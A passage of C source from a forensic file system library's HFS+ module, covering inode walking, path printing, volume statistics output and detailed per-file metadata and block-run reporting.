if (TSK_WALK_STOP == retval) {
break;
}
else if (TSK_WALK_ERROR == retval) {
tsk_fs_block_free(fs_block);
return 1;
}
}
tsk_fs_block_free(fs_block);
return 0;
}
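/** \internal
* Walk a range of catalog records (inodes) and call a callback for each
* record that matches the given flags.
*
* @param fs File system being analyzed
* @param start_inum First inode to walk
* @param end_inum Last inode to walk (inclusive)
* @param flags Flags that determine which inodes are passed to the callback
* @param action Callback function
* @param ptr Pointer passed to the callback
* @returns 1 on error and 0 on success
*/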
uint8_t
hfs_inode_walk(TSK_FS_INFO * fs, TSK_INUM_T start_inum,
TSK_INUM_T end_inum, TSK_FS_META_FLAG_ENUM flags,
TSK_FS_META_WALK_CB action, void *ptr)
{
TSK_INUM_T inum;
TSK_FS_FILE *fs_file;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_inode_walk: start_inum: %" PRIuINUM " end_inum: %"
PRIuINUM " flags: %" PRIu32 "\n", start_inum, end_inum, flags);
/*
* Sanity checks.
*/
if (start_inum < fs->first_inum || start_inum > fs->last_inum) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_WALK_RNG);
tsk_error_set_errstr("inode_walk: Start inode: %" PRIuINUM "",
start_inum);
return 1;
}
else if (end_inum < fs->first_inum || end_inum > fs->last_inum
|| end_inum < start_inum) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_WALK_RNG);
tsk_error_set_errstr("inode_walk: End inode: %" PRIuINUM "",
end_inum);
return 1;
}
/* If ORPHAN is wanted, then make sure that the flags are correct */
if (flags & TSK_FS_META_FLAG_ORPHAN) {
flags |= TSK_FS_META_FLAG_UNALLOC;
flags &= ~TSK_FS_META_FLAG_ALLOC;
flags |= TSK_FS_META_FLAG_USED;
flags &= ~TSK_FS_META_FLAG_UNUSED;
}
else {
if (((flags & TSK_FS_META_FLAG_ALLOC) == 0) &&
((flags & TSK_FS_META_FLAG_UNALLOC) == 0)) {
flags |= (TSK_FS_META_FLAG_ALLOC | TSK_FS_META_FLAG_UNALLOC);
}
/* If neither of the USED or UNUSED flags are set, then set them
* both
*/
if (((flags & TSK_FS_META_FLAG_USED) == 0) &&
((flags & TSK_FS_META_FLAG_UNUSED) == 0)) {
flags |= (TSK_FS_META_FLAG_USED | TSK_FS_META_FLAG_UNUSED);
}
}
if ((fs_file = tsk_fs_file_alloc(fs)) == NULL)
return 1;
if ((fs_file->meta = tsk_fs_meta_alloc(HFS_FILE_CONTENT_LEN)) == NULL)
return 1;
if (start_inum > end_inum)
XSWAP(start_inum, end_inum);
for (inum = start_inum; inum <= end_inum; ++inum) {
int retval;
if (hfs_inode_lookup(fs, fs_file, inum)) {
// deleted files may not exist in the catalog
if (tsk_error_get_errno() == TSK_ERR_FS_INODE_NUM) {
tsk_error_reset();
continue;
}
else {
tsk_fs_file_close(fs_file);
return 1;
}
}
if ((fs_file->meta->flags & flags) != fs_file->meta->flags)
continue;
/* call action */
retval = action(fs_file, ptr);
if (retval == TSK_WALK_STOP) {
tsk_fs_file_close(fs_file);
return 0;
}
else if (retval == TSK_WALK_ERROR) {
tsk_fs_file_close(fs_file);
return 1;
}
}
tsk_fs_file_close(fs_file);
return 0;
}
/* return the name of a file at a given inode
* in a newly-allocated string, or NULL on error
*/
char *
hfs_get_inode_name(TSK_FS_INFO * fs, TSK_INUM_T inum)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
HFS_ENTRY entry;
char *fn = NULL;
if (hfs_cat_file_lookup(hfs, inum, &entry, FALSE))
return NULL;
fn = malloc(HFS_MAXNAMLEN + 1);
if (fn == NULL)
return NULL;
if (hfs_UTF16toUTF8(fs, entry.thread.name.unicode,
tsk_getu16(fs->endian, entry.thread.name.length), fn,
HFS_MAXNAMLEN + 1, HFS_U16U8_FLAG_REPLACE_SLASH)) {
free(fn);
return NULL;
}
return fn;
}
/* print the name of a file at a given inode
* returns 0 on success, 1 on error */
static uint8_t
print_inode_name(FILE * hFile, TSK_FS_INFO * fs, TSK_INUM_T inum)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
char fn[HFS_MAXNAMLEN + 1];
HFS_ENTRY entry;
if (hfs_cat_file_lookup(hfs, inum, &entry, FALSE))
return 1;
if (hfs_UTF16toUTF8(fs, entry.thread.name.unicode,
tsk_getu16(fs->endian, entry.thread.name.length), fn,
HFS_MAXNAMLEN + 1, HFS_U16U8_FLAG_REPLACE_SLASH))
return 1;
tsk_fprintf(hFile, "%s", fn);
return 0;
}
/* tail recursive function to print a path... prints the parent path, then
* appends / and the name of the given inode. prints nothing for root
* returns 0 on success, 1 on failure
*/
static uint8_t
print_parent_path(FILE * hFile, TSK_FS_INFO * fs, TSK_INUM_T inum)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
char fn[HFS_MAXNAMLEN + 1];
HFS_ENTRY entry;
if (inum == HFS_ROOT_INUM)
return 0;
if (inum <= HFS_ROOT_INUM) {
tsk_error_set_errno(TSK_ERR_FS_INODE_NUM);
tsk_error_set_errstr("print_parent_path: out-of-range inode %"
PRIuINUM, inum);
return 1;
}
if (hfs_cat_file_lookup(hfs, inum, &entry, FALSE))
return 1;
if (hfs_UTF16toUTF8(fs, entry.thread.name.unicode,
tsk_getu16(fs->endian, entry.thread.name.length), fn,
HFS_MAXNAMLEN + 1,
HFS_U16U8_FLAG_REPLACE_SLASH | HFS_U16U8_FLAG_REPLACE_CONTROL))
return 1;
if (print_parent_path(hFile, fs, (TSK_INUM_T) tsk_getu32(fs->endian,
entry.thread.parent_cnid)))
return 1;
tsk_fprintf(hFile, "/%s", fn);
return 0;
}
/* print the file name corresponding to an inode, in brackets after a space.
* uses Unix path conventions, and does not include the volume name.
* returns 0 on success, 1 on failure
*/
static uint8_t
print_inode_file(FILE * hFile, TSK_FS_INFO * fs, TSK_INUM_T inum)
{
tsk_fprintf(hFile, " [");
if (inum == HFS_ROOT_INUM)
tsk_fprintf(hFile, "/");
else {
if (print_parent_path(hFile, fs, inum)) {
tsk_fprintf(hFile, "unknown]");
return 1;
}
}
tsk_fprintf(hFile, "]");
return 0;
}
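/* Verify the consistency of the file system. Not implemented for HFS+;
* always sets an error and returns 1. */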
static uint8_t
hfs_fscheck(TSK_FS_INFO * fs, FILE * hFile)
{
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_UNSUPFUNC);
tsk_error_set_errstr("fscheck not implemented for HFS yet");
return 1;
}
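/** \internal
* Print general file system statistics (volume header, metadata and
* content information) to a file handle.
*
* @param fs File system being analyzed
* @param hFile File handle to print text to
* @returns 1 on error and 0 on success
*/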
static uint8_t
hfs_fsstat(TSK_FS_INFO * fs, FILE * hFile)
{
// char *myname = "hfs_fsstat";
HFS_INFO *hfs = (HFS_INFO *) fs;
hfs_plus_vh *sb = hfs->fs;
time_t mac_time;
TSK_INUM_T inode;
char timeBuf[128];
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_fstat: called\n");
tsk_fprintf(hFile, "FILE SYSTEM INFORMATION\n");
tsk_fprintf(hFile, "--------------------------------------------\n");
tsk_fprintf(hFile, "File System Type: ");
if (tsk_getu16(fs->endian, hfs->fs->signature) == HFS_VH_SIG_HFSPLUS)
tsk_fprintf(hFile, "HFS+\n");
else if (tsk_getu16(fs->endian, hfs->fs->signature) == HFS_VH_SIG_HFSX)
tsk_fprintf(hFile, "HFSX\n");
else
tsk_fprintf(hFile, "Unknown\n");
// print name and number of version
tsk_fprintf(hFile, "File System Version: ");
switch (tsk_getu16(fs->endian, hfs->fs->version)) {
case 4:
tsk_fprintf(hFile, "HFS+\n");
break;
case 5:
tsk_fprintf(hFile, "HFSX\n");
break;
default:
tsk_fprintf(hFile, "Unknown (%" PRIu16 ")\n",
tsk_getu16(fs->endian, hfs->fs->version));
break;
}
if (tsk_getu16(fs->endian, hfs->fs->signature) == HFS_VH_SIG_HFSX) {
tsk_fprintf(hFile, "Case Sensitive: %s\n",
hfs->is_case_sensitive ? "yes" : "no");
}
if (hfs->hfs_wrapper_offset > 0) {
tsk_fprintf(hFile,
"File system is embedded in an HFS wrapper at offset %" PRIuOFF
"\n", hfs->hfs_wrapper_offset);
}
tsk_fprintf(hFile, "\nVolume Name: ");
if (print_inode_name(hFile, fs, HFS_ROOT_INUM))
return 1;
tsk_fprintf(hFile, "\n");
tsk_fprintf(hFile, "Volume Identifier: %08" PRIx32 "%08" PRIx32 "\n",
tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_ID1]),
tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_ID2]));
// print last mounted info
tsk_fprintf(hFile, "\nLast Mounted By: ");
if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_HFSPLUS)
tsk_fprintf(hFile, "Mac OS X\n");
else if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_HFSJ)
tsk_fprintf(hFile, "Mac OS X, Journaled\n");
else if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_FSK)
tsk_fprintf(hFile, "failed journal replay\n");
else if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_FSCK)
tsk_fprintf(hFile, "fsck_hfs\n");
else if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_OS89)
tsk_fprintf(hFile, "Mac OS 8.1 - 9.2.2\n");
else
tsk_fprintf(hFile, "Unknown (%" PRIx32 "\n",
tsk_getu32(fs->endian, sb->last_mnt_ver));
/* State of the file system */
if ((tsk_getu32(fs->endian, hfs->fs->attr) & HFS_VH_ATTR_UNMOUNTED)
&& (!(tsk_getu32(fs->endian,
hfs->fs->attr) & HFS_VH_ATTR_INCONSISTENT)))
tsk_fprintf(hFile, "Volume Unmounted Properly\n");
else
tsk_fprintf(hFile, "Volume Unmounted Improperly\n");
tsk_fprintf(hFile, "Mount Count: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->write_cnt));
// Dates
// (creation date is in local time zone, not UTC, according to TN 1150)
mac_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, hfs->fs->cr_date));
tsk_fprintf(hFile, "\nCreation Date: \t%s\n",
tsk_fs_time_to_str(mktime(gmtime(&mac_time)), timeBuf));
mac_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, hfs->fs->m_date));
tsk_fprintf(hFile, "Last Written Date: \t%s\n",
tsk_fs_time_to_str(mac_time, timeBuf));
mac_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian,
hfs->fs->bkup_date));
tsk_fprintf(hFile, "Last Backup Date: \t%s\n",
tsk_fs_time_to_str(mac_time, timeBuf));
mac_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, hfs->fs->chk_date));
tsk_fprintf(hFile, "Last Checked Date: \t%s\n",
tsk_fs_time_to_str(mac_time, timeBuf));
if (tsk_getu32(fs->endian, hfs->fs->attr) & HFS_VH_ATTR_SOFTWARE_LOCK)
tsk_fprintf(hFile, "Software write protect enabled\n");
/* Print journal information */
if (tsk_getu32(fs->endian, sb->attr) & HFS_VH_ATTR_JOURNALED) {
tsk_fprintf(hFile, "\nJournal Info Block: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->jinfo_blk));
}
tsk_fprintf(hFile, "\nMETADATA INFORMATION\n");
tsk_fprintf(hFile, "--------------------------------------------\n");
tsk_fprintf(hFile, "Range: %" PRIuINUM " - %" PRIuINUM "\n",
fs->first_inum, fs->last_inum);
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_BOOT]);
tsk_fprintf(hFile, "Bootable Folder ID: %" PRIuINUM, inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_START]);
tsk_fprintf(hFile, "Startup App ID: %" PRIuINUM, inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_OPEN]);
tsk_fprintf(hFile, "Startup Open Folder ID: %" PRIuINUM, inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_BOOT9]);
tsk_fprintf(hFile, "Mac OS 8/9 Blessed System Folder ID: %" PRIuINUM,
inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_BOOTX]);
tsk_fprintf(hFile, "Mac OS X Blessed System Folder ID: %" PRIuINUM,
inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
tsk_fprintf(hFile, "Number of files: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->file_cnt));
tsk_fprintf(hFile, "Number of folders: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->fldr_cnt));
tsk_fprintf(hFile, "\nCONTENT INFORMATION\n");
tsk_fprintf(hFile, "--------------------------------------------\n");
tsk_fprintf(hFile, "Block Range: %" PRIuDADDR " - %" PRIuDADDR "\n",
fs->first_block, fs->last_block);
if (fs->last_block != fs->last_block_act)
tsk_fprintf(hFile,
"Total Range in Image: %" PRIuDADDR " - %" PRIuDADDR "\n",
fs->first_block, fs->last_block_act);
tsk_fprintf(hFile, "Allocation Block Size: %u\n", fs->block_size);
tsk_fprintf(hFile, "Number of Free Blocks: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->free_blks));
if (tsk_getu32(fs->endian, hfs->fs->attr) & HFS_VH_ATTR_BADBLOCKS)
tsk_fprintf(hFile, "Volume has bad blocks\n");
return 0;
}
/************************* istat *******************************/
/**
* Text encoding names defined in TN1150, Table 2.
*/
static char *
text_encoding_name(uint32_t enc)
{
switch (enc) {
case 0:
return "MacRoman";
case 1:
return "MacJapanese";
case 2:
return "MacChineseTrad";
case 4:
return "MacKorean";
case 5:
return "MacArabic";
case 6:
return "MacHebrew";
case 7:
return "MacGreek";
case 8:
return "MacCyrillic";
case 9:
return "MacDevanagari";
case 10:
return "MacGurmukhi";
case 11:
return "MacGujarati";
case 12:
return "MacOriya";
case 13:
return "MacBengali";
case 14:
return "MacTamil";
case 15:
return "Telugu";
case 16:
return "MacKannada";
case 17:
return "MacMalayalam";
case 18:
return "MacSinhalese";
case 19:
return "MacBurmese";
case 20:
return "MacKhmer";
case 21:
return "MacThai";
case 22:
return "MacLaotian";
case 23:
return "MacGeorgian";
case 24:
return "MacArmenian";
case 25:
return "MacChineseSimp";
case 26:
return "MacTibetan";
case 27:
return "MacMongolian";
case 28:
return "MacEthiopic";
case 29:
return "MacCentralEurRoman";
case 30:
return "MacVietnamese";
case 31:
return "MacExtArabic";
case 33:
return "MacSymbol";
case 34:
return "MacDingbats";
case 35:
return "MacTurkish";
case 36:
return "MacCroatian";
case 37:
return "MacIcelandic";
case 38:
return "MacRomanian";
case 49:
case 140:
return "MacFarsi";
case 48:
case 152:
return "MacUkrainian";
default:
return "Unknown encoding";
}
}
#define HFS_PRINT_WIDTH 8
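/* State used when printing the block addresses of a fork: the output file
* handle, the number of entries printed on the current line, and the run
* of consecutive blocks currently being accumulated. */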
typedef struct {
FILE *hFile;
int idx;
TSK_DADDR_T startBlock;
uint32_t blockCount;
unsigned char accumulating;
} HFS_PRINT_ADDR;
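/* Flush the run of blocks accumulated in an HFS_PRINT_ADDR structure to its
* file handle, printing either a single block or a start-end range, and
* wrapping the output line after HFS_PRINT_WIDTH entries. */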
static void
output_print_addr(HFS_PRINT_ADDR * print)
{
if (!print->accumulating)
return;
if (print->blockCount == 1) {
tsk_fprintf(print->hFile, "%" PRIuDADDR " ", print->startBlock);
print->idx += 1;
}
else if (print->blockCount > 1) {
tsk_fprintf(print->hFile, "%" PRIuDADDR "-%" PRIuDADDR " ",
print->startBlock, print->startBlock + print->blockCount - 1);
print->idx += 2;
}
if (print->idx >= HFS_PRINT_WIDTH) {
tsk_fprintf(print->hFile, "\n");
print->idx = 0;
}
}
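/* Block walk callback that accumulates consecutive block addresses into
* runs and prints each completed run via output_print_addr(). */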
static TSK_WALK_RET_ENUM
print_addr_act(TSK_FS_FILE * fs_file, TSK_OFF_T a_off, TSK_DADDR_T addr,
char *buf, size_t size, TSK_FS_BLOCK_FLAG_ENUM flags, void *ptr)
{
HFS_PRINT_ADDR *print = (HFS_PRINT_ADDR *) ptr;
if (print->accumulating) {
if (addr == print->startBlock + print->blockCount) {
++print->blockCount;
}
else {
output_print_addr(print);
print->startBlock = addr;
print->blockCount = 1;
}
}
else {
print->startBlock = addr;
print->blockCount = 1;
print->accumulating = TRUE;
}
return TSK_WALK_CONT;
}
/**
* Print details on a specific file to a file handle.
*
* @param fs File system file is located in
* @param istat_flags Flags that control the output (e.g. TSK_FS_ISTAT_RUNLIST)
* @param hFile File handle to print text to
* @param inum Address of file in file system
* @param numblock The number of blocks in file to force print (can go beyond file size)
* @param sec_skew Clock skew in seconds to also print times in
*
* @returns 1 on error and 0 on success
*/
static uint8_t
hfs_istat(TSK_FS_INFO * fs, TSK_FS_ISTAT_FLAG_ENUM istat_flags, FILE * hFile, TSK_INUM_T inum,
TSK_DADDR_T numblock, int32_t sec_skew)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
TSK_FS_FILE *fs_file;
char hfs_mode[12];
HFS_PRINT_ADDR print;
HFS_ENTRY entry;
char timeBuf[128];
// Compression ATTR, if there is one:
const TSK_FS_ATTR *compressionAttr = NULL;
RES_DESCRIPTOR *rd; // descriptor of a resource
tsk_error_reset();
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_istat: inum: %" PRIuINUM " numblock: %" PRIu32 "\n",
inum, numblock);
if ((fs_file = tsk_fs_file_open_meta(fs, NULL, inum)) == NULL) {
error_returned("hfs_istat: getting metadata for the file");
return 1;
}
if (inum >= HFS_FIRST_USER_CNID) {
int rslt;
tsk_fprintf(hFile, "File Path: ");
rslt = print_parent_path(hFile, fs, inum);
if (rslt != 0)
tsk_fprintf(hFile, " Error in printing path\n");
else
tsk_fprintf(hFile, "\n");
}
else {
// All of the files in this inum range have names without nulls,
// slashes or control characters. So, it is OK to print this UTF8
// string this way.
if (fs_file->meta->name2 != NULL)
tsk_fprintf(hFile, "File Name: %s\n",
fs_file->meta->name2->name);
}
tsk_fprintf(hFile, "Catalog Record: %" PRIuINUM "\n", inum);
tsk_fprintf(hFile, "%sAllocated\n",
(fs_file->meta->flags & TSK_FS_META_FLAG_UNALLOC) ? "Not " : "");
tsk_fprintf(hFile, "Type:\t");
if (fs_file->meta->type == TSK_FS_META_TYPE_REG)
tsk_fprintf(hFile, "File\n");
else if (TSK_FS_IS_DIR_META(fs_file->meta->type))
tsk_fprintf(hFile, "Folder\n");
else
tsk_fprintf(hFile, "\n");
tsk_fs_meta_make_ls(fs_file->meta, hfs_mode, sizeof(hfs_mode));
tsk_fprintf(hFile, "Mode:\t%s\n", hfs_mode);
tsk_fprintf(hFile, "Size:\t%" PRIuOFF "\n", fs_file->meta->size);
if (fs_file->meta->link)
tsk_fprintf(hFile, "Symbolic link to:\t%s\n", fs_file->meta->link);
tsk_fprintf(hFile, "uid / gid: %" PRIuUID " / %" PRIuGID "\n",
fs_file->meta->uid, fs_file->meta->gid);
tsk_fprintf(hFile, "Link count:\t%d\n", fs_file->meta->nlink);
if (hfs_cat_file_lookup(hfs, inum, &entry, TRUE) == 0) {
hfs_uni_str *nm = &entry.thread.name;
char name_buf[HFS_MAXNAMLEN + 1];
TSK_INUM_T par_cnid; // parent CNID
tsk_fprintf(hFile, "\n");
hfs_UTF16toUTF8(fs, nm->unicode, (int) tsk_getu16(fs->endian,
nm->length), &name_buf[0], HFS_MAXNAMLEN + 1,
HFS_U16U8_FLAG_REPLACE_SLASH | HFS_U16U8_FLAG_REPLACE_CONTROL);
tsk_fprintf(hFile, "File Name: %s\n", name_buf);
// Test here to see if this is a hard link.
par_cnid = tsk_getu32(fs->endian, &(entry.thread.parent_cnid));
if ((hfs->has_meta_dir_crtime && par_cnid == hfs->meta_dir_inum) ||
(hfs->has_meta_crtime && par_cnid == hfs->meta_inum)) {
int instr = strncmp(name_buf, "iNode", 5);
int drstr = strncmp(name_buf, "dir_", 4);
if (instr == 0 &&
hfs->has_meta_crtime && par_cnid == hfs->meta_inum) {
tsk_fprintf(hFile, "This is a hard link to a file\n");
}
else if (drstr == 0 &&
hfs->has_meta_dir_crtime &&
par_cnid == hfs->meta_dir_inum) {
tsk_fprintf(hFile, "This is a hard link to a folder.\n");
}
}
/* The cat.perm union contains file-type specific values.
* Print them if they are relevant. */
if ((fs_file->meta->type == TSK_FS_META_TYPE_CHR) ||
(fs_file->meta->type == TSK_FS_META_TYPE_BLK)) {
tsk_fprintf(hFile, "Device ID:\t%" PRIu32 "\n",
tsk_getu32(fs->endian, entry.cat.std.perm.special.raw));
}
else if ((tsk_getu32(fs->endian,
entry.cat.std.u_info.file_type) ==
HFS_HARDLINK_FILE_TYPE)
&& (tsk_getu32(fs->endian,
entry.cat.std.u_info.file_cr) ==
HFS_HARDLINK_FILE_CREATOR)) {
// technically, the creation date of this item should be the same as either the
// creation date of the "HFS+ Private Data" folder or the creation date of the root folder
tsk_fprintf(hFile, "Hard link inode number\t %" PRIu32 "\n",
tsk_getu32(fs->endian, entry.cat.std.perm.special.inum));
}
tsk_fprintf(hFile, "Admin flags: %" PRIu8,
entry.cat.std.perm.a_flags);
if (entry.cat.std.perm.a_flags != 0) {
tsk_fprintf(hFile, " - ");
if (entry.cat.std.perm.a_flags & HFS_PERM_AFLAG_ARCHIVED)
tsk_fprintf(hFile, "archived ");
if (entry.cat.std.perm.a_flags & HFS_PERM_AFLAG_IMMUTABLE)
tsk_fprintf(hFile, "immutable ");
if (entry.cat.std.perm.a_flags & HFS_PERM_AFLAG_APPEND)
tsk_fprintf(hFile, "append-only ");
}
tsk_fprintf(hFile, "\n");
tsk_fprintf(hFile, "Owner flags: %" PRIu8,
entry.cat.std.perm.o_flags);
if (entry.cat.std.perm.o_flags != 0) {
tsk_fprintf(hFile, " - ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_NODUMP)
tsk_fprintf(hFile, "no-dump ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_IMMUTABLE)
tsk_fprintf(hFile, "immutable ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_APPEND)
tsk_fprintf(hFile, "append-only ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_OPAQUE)
tsk_fprintf(hFile, "opaque ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_COMPRESSED)
tsk_fprintf(hFile, "compressed ");
}
tsk_fprintf(hFile, "\n");
if (tsk_getu16(fs->endian,
entry.cat.std.flags) & HFS_FILE_FLAG_LOCKED)
tsk_fprintf(hFile, "Locked\n");
if (tsk_getu16(fs->endian,
entry.cat.std.flags) & HFS_FILE_FLAG_ATTR)
tsk_fprintf(hFile, "Has extended attributes\n");
if (tsk_getu16(fs->endian,
entry.cat.std.flags) & HFS_FILE_FLAG_ACL)
tsk_fprintf(hFile, "Has security data (ACLs)\n");
// File_type and file_cr are not relevant for Folders
if ( !TSK_FS_IS_DIR_META(fs_file->meta->type)){
int windx; // loop index
tsk_fprintf(hFile,
"File type:\t%04" PRIx32 " ",
tsk_getu32(fs->endian, entry.cat.std.u_info.file_type));
for (windx = 0; windx < 4; ++windx) {
uint8_t cu = entry.cat.std.u_info.file_type[windx];
if (cu >= 32 && cu <= 126)
tsk_fprintf(hFile, "%c", (char) cu);
else
tsk_fprintf(hFile, " ");
}
tsk_fprintf(hFile, "\n");
tsk_fprintf(hFile,
"File creator:\t%04" PRIx32 " ",
tsk_getu32(fs->endian, entry.cat.std.u_info.file_cr));
for (windx = 0; windx < 4; ++windx) {
uint8_t cu = entry.cat.std.u_info.file_cr[windx];
if (cu >= 32 && cu <= 126)
tsk_fprintf(hFile, "%c", (char) cu);
else
tsk_fprintf(hFile, " ");
}
tsk_fprintf(hFile, "\n");
} // END if(not folder)
if (tsk_getu16(fs->endian,
entry.cat.std.u_info.flags) & HFS_FINDER_FLAG_NAME_LOCKED)
tsk_fprintf(hFile, "Name locked\n");
if (tsk_getu16(fs->endian,
entry.cat.std.u_info.flags) & HFS_FINDER_FLAG_HAS_BUNDLE)
tsk_fprintf(hFile, "Has bundle\n");
if (tsk_getu16(fs->endian,
entry.cat.std.u_info.flags) & HFS_FINDER_FLAG_IS_INVISIBLE)
tsk_fprintf(hFile, "Is invisible\n");
if (tsk_getu16(fs->endian,
entry.cat.std.u_info.flags) & HFS_FINDER_FLAG_IS_ALIAS)
tsk_fprintf(hFile, "Is alias\n");
tsk_fprintf(hFile, "Text encoding:\t%" PRIx32 " = %s\n",
tsk_getu32(fs->endian, entry.cat.std.text_enc),
text_encoding_name(tsk_getu32(fs->endian,
entry.cat.std.text_enc)));
if (tsk_getu16(fs->endian,
entry.cat.std.rec_type) == HFS_FILE_RECORD) {
tsk_fprintf(hFile, "Resource fork size:\t%" PRIu64 "\n",
tsk_getu64(fs->endian, entry.cat.resource.logic_sz));
}
}
if (sec_skew != 0) {
tsk_fprintf(hFile, "\nAdjusted times:\n");
if (fs_file->meta->mtime)
fs_file->meta->mtime -= sec_skew;
if (fs_file->meta->atime)
fs_file->meta->atime -= sec_skew;
if (fs_file->meta->ctime)
fs_file->meta->ctime -= sec_skew;
if (fs_file->meta->crtime)
fs_file->meta->crtime -= sec_skew;
if (fs_file->meta->time2.hfs.bkup_time)
fs_file->meta->time2.hfs.bkup_time -= sec_skew;
tsk_fprintf(hFile, "Created:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->crtime, timeBuf));
tsk_fprintf(hFile, "Content Modified:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->mtime, timeBuf));
tsk_fprintf(hFile, "Attributes Modified:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->ctime, timeBuf));
tsk_fprintf(hFile, "Accessed:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->atime, timeBuf));
tsk_fprintf(hFile, "Backed Up:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->time2.hfs.bkup_time,
timeBuf));
if (fs_file->meta->mtime)
fs_file->meta->mtime += sec_skew;
if (fs_file->meta->atime)
fs_file->meta->atime += sec_skew;
if (fs_file->meta->ctime)
fs_file->meta->ctime += sec_skew;
if (fs_file->meta->crtime)
fs_file->meta->crtime += sec_skew;
if (fs_file->meta->time2.hfs.bkup_time)
fs_file->meta->time2.hfs.bkup_time += sec_skew;
tsk_fprintf(hFile, "\nOriginal times:\n");
}
else {
tsk_fprintf(hFile, "\nTimes:\n");
}
tsk_fprintf(hFile, "Created:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->crtime, timeBuf));
tsk_fprintf(hFile, "Content Modified:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->mtime, timeBuf));
tsk_fprintf(hFile, "Attributes Modified:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->ctime, timeBuf));
tsk_fprintf(hFile, "Accessed:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->atime, timeBuf));
tsk_fprintf(hFile, "Backed Up:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->time2.hfs.bkup_time, timeBuf));
// IF this is a regular file, then print out the blocks of the DATA and RSRC forks.
if (tsk_getu16(fs->endian, entry.cat.std.rec_type) == HFS_FILE_RECORD) {
// Only print DATA fork blocks if this file is NOT compressed
// N.B., a compressed file has no data fork, and tsk_fs_file_walk() will
// do the wrong thing!
if (!(entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_COMPRESSED)) {
if (!(istat_flags & TSK_FS_ISTAT_RUNLIST)) {
tsk_fprintf(hFile, "\nData Fork Blocks:\n");
print.idx = 0;
print.hFile = hFile;
print.accumulating = FALSE;
print.startBlock = 0;
print.blockCount = 0;
if (tsk_fs_file_walk_type(fs_file,
TSK_FS_ATTR_TYPE_HFS_DATA, HFS_FS_ATTR_ID_DATA,
(TSK_FS_FILE_WALK_FLAG_AONLY |
TSK_FS_FILE_WALK_FLAG_SLACK), print_addr_act,
(void *)&print)) {
tsk_fprintf(hFile, "\nError reading file data fork\n");
tsk_error_print(hFile);
tsk_error_reset();
}
else {
output_print_addr(&print);
if (print.idx != 0)
tsk_fprintf(hFile, "\n");
}
}
}
// Only print out the blocks of the Resource fork if it has nonzero size
if (tsk_getu64(fs->endian, entry.cat.resource.logic_sz) > 0) {
if (! (istat_flags & TSK_FS_ISTAT_RUNLIST)) {
tsk_fprintf(hFile, "\nResource Fork Blocks:\n");
print.idx = 0;
print.hFile = hFile;
print.accumulating = FALSE;
print.startBlock = 0;
print.blockCount = 0;
if (tsk_fs_file_walk_type(fs_file,
TSK_FS_ATTR_TYPE_HFS_RSRC, HFS_FS_ATTR_ID_RSRC,
(TSK_FS_FILE_WALK_FLAG_AONLY |
TSK_FS_FILE_WALK_FLAG_SLACK), print_addr_act,
(void *)&print)) {
tsk_fprintf(hFile, "\nError reading file resource fork\n");
tsk_error_print(hFile);
tsk_error_reset();
}
else {
output_print_addr(&print);
if (print.idx != 0)
tsk_fprintf(hFile, "\n");
}
}
}
}
// Force the loading of all attributes.
(void) tsk_fs_file_attr_get(fs_file);
/* Print all of the attributes */
tsk_fprintf(hFile, "\nAttributes: \n");
if (fs_file->meta->attr) {
int cnt, i;
// cycle through the attributes
cnt = tsk_fs_file_attr_getsize(fs_file);
for (i = 0; i < cnt; ++i) {
const char *type; // type of the attribute as a string
const TSK_FS_ATTR *fs_attr =
tsk_fs_file_attr_get_idx(fs_file, i);
if (!fs_attr)
continue;
type = hfs_attrTypeName((uint32_t) fs_attr->type);
